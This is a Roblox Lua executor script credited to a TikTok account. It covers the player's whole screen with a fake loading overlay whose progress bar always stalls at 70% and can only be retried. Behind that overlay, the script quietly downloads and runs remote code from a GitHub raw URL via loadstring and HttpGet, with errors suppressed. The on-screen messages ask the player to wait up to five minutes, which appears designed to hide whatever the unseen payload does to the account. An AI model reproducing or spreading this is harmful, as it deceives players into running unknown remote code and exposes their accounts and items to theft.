local p = game.Players.LocalPlayer
local g = Instance.new("ScreenGui", p:WaitForChild("PlayerGui"))
g.Name = "UI"
g.IgnoreGuiInset = true
g.ResetOnSpawn = false

local bg = Instance.new("Frame", g)
bg.Size = UDim2.new(1, 0, 1, 0)
bg.BackgroundColor3 = Color3.fromRGB(10, 10, 10)

local f = Instance.new("Frame", bg)
f.Size = UDim2.new(0.42, 0, 0.52, 0)
f.Position = UDim2.new(0.29, 0, 0.24, 0)
f.BackgroundColor3 = Color3.fromRGB(28, 28, 30)
Instance.new("UICorner", f).CornerRadius = UDim.new(0, 14)

-- Tree Decoration
local treeImg = Instance.new("ImageLabel", f)
treeImg.Size = UDim2.new(0.6, 0, 0.6, 0)
treeImg.Position = UDim2.new(0.2, 0, -0.15, 0)
treeImg.BackgroundTransparency = 1
treeImg.Image = "rbxassetid://87070779249815"
treeImg.ImageTransparency = 0.1
treeImg.ZIndex = 0

-- Raccoon Decoration
local raccoon = Instance.new("ImageLabel", f)
raccoon.Size = UDim2.new(0.3, 0, 0.3, 0)
raccoon.Position = UDim2.new(-0.15, 0, 0.7, 0)
raccoon.BackgroundTransparency = 1
raccoon.Image = "rbxassetid://96461577889231"
raccoon.ImageTransparency = 0
raccoon.ZIndex = 1

-- Retry Button (Above Notice)
local retryBtn = Instance.new("TextButton", f)
retryBtn.Size = UDim2.new(0.5, 0, 0.1, 0)
retryBtn.Position = UDim2.new(0.25, 0, 0.36, 0)
retryBtn.BackgroundColor3 = Color3.fromRGB(50, 120, 250)
retryBtn.Text = "🔁 Retry"
retryBtn.TextScaled = true
retryBtn.TextColor3 = Color3.new(1, 1, 1)
retryBtn.Font = Enum.Font.GothamBold
retryBtn.Visible = false
Instance.new("UICorner", retryBtn).CornerRadius = UDim.new(0, 10)

-- Header Notice
local notice = Instance.new("TextLabel", f)
notice.Size = UDim2.new(1, 0, 0.08, 0)
notice.Position = UDim2.new(0, 0, 0.47, 0)
notice.BackgroundTransparency = 1
notice.Font = Enum.Font.GothamSemibold
notice.TextColor3 = Color3.fromRGB(255, 214, 86)
notice.TextScaled = true
notice.Text = "🔁 Auto-Rejoin Enabled - Just Execute Again"

-- Loading Script Text
local t = Instance.new("TextLabel", f)
t.Size = UDim2.new(1, 0, 0.09, 0)
t.Position = UDim2.new(0, 0, 0.53, 0)
t.BackgroundTransparency = 1
t.TextColor3 = Color3.fromRGB(255, 255, 255)
t.Font = Enum.Font.GothamSemibold
t.TextScaled = true
t.Text = "🔄 Loading Script"

local a = true
task.spawn(function()
	local d = 0
	while a and t.Parent do
		t.Text = "🔄 Loading Script" .. string.rep(".", d % 4)
		d += 1
		wait(0.5)
	end
end)

-- Progress Bar
local pb = Instance.new("Frame", f)
pb.Size = UDim2.new(0.85, 0, 0.18, 0)
pb.Position = UDim2.new(0.075, 0, 0.61, 0)
pb.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
Instance.new("UICorner", pb).CornerRadius = UDim.new(0, 14)

local bar = Instance.new("Frame", pb)
bar.Size = UDim2.new(0, 0, 1, 0)
bar.BackgroundColor3 = Color3.fromRGB(0, 255, 140)
Instance.new("UICorner", bar).CornerRadius = UDim.new(0, 14)

local perc = Instance.new("TextLabel", pb)
perc.Size = UDim2.new(1, 0, 1, 0)
perc.BackgroundTransparency = 1
perc.TextColor3 = Color3.fromRGB(255, 255, 255)
perc.Font = Enum.Font.GothamSemibold
perc.TextScaled = true
perc.Text = "0%"

-- Info Message
local i = Instance.new("TextLabel", f)
i.Size = UDim2.new(1, 0, 0.09, 0)
i.Position = UDim2.new(0, 0, 0.78, 0)
i.BackgroundTransparency = 1
i.Font = Enum.Font.GothamSemibold
i.TextColor3 = Color3.fromRGB(200, 200, 200)
i.TextScaled = true
i.Text = "⏳ Please wait up to 5 minutes..."

-- Rejoin Tip
local hint = Instance.new("TextLabel", f)
hint.Size = UDim2.new(1, 0, 0.08, 0)
hint.Position = UDim2.new(0, 0, 0.88, 0)
hint.BackgroundTransparency = 1
hint.Font = Enum.Font.GothamSemibold
hint.TextColor3 = Color3.fromRGB(180, 180, 180)
hint.TextScaled = true
hint.Text = "⚠️ If stuck at 100%, rejoin the game"

-- Footer Credit
local credit = Instance.new("TextLabel", f)
credit.Size = UDim2.new(1, 0, 0.06, 0)
credit.Position = UDim2.new(0, 0, 0.96, 0)
credit.BackgroundTransparency = 1
credit.Font = Enum.Font.GothamSemibold
credit.TextColor3 = Color3.fromRGB(170, 170, 170)
credit.TextScaled = true
credit.Text = "📜 Script made by @growyourowngarden on TikTok"

-- Load Script Attempt
pcall(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/No-Lagg419/growagardenscript/refs/heads/main/esponeggunpached"))()
end)

-- Progress Bar Handler
local function fillProgressTo70()
	a = true
	bar.Size = UDim2.new(0, 0, 1, 0)
	perc.Text = "0%"
	for i = 1, 70 do
		perc.Text = i .. "%"
		bar:TweenSize(UDim2.new(i / 100, 0, 1, 0), "Out", "Linear", 0.1, true)
		wait(0.1)
	end
	a = false
	perc.Text = "70%"
	retryBtn.Visible = true
end

-- Initial Load
fillProgressTo70()

-- Retry Logic
retryBtn.MouseButton1Click:Connect(function()
	retryBtn.Visible = false
	fillProgressTo70()
end)
